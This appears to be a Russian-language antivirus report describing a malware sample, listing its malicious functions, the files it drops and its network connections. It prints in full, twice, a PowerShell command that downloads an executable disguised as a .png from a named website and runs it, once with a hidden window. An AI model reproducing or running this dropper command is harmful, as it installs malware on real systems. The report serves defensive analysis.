Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://benwellgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png как %temp%\fxgkexr.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://benwellgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png','%TMP%\fxgkexr.exe');Start-Process '%TMP%\fxgkexr.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1404
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\705046.cvr
- %TEMP%\fxgkexr.exe
Сетевая активность
Подключается к
- 'be####lgroup.co.uk':80
TCP
Запросы HTTP GET
- http://be####lgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png
Другие
- '34.##9.100.209':443
UDP
- DNS ASK be####lgroup.co.uk
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://benwellgroup.co.uk/60892eb296e937266bf9f3e38f2c5a.png','%TMP%\fxgkexr.exe');Start-Process '%TMP%\fxgkexr.exe'; (со скрытым окном)
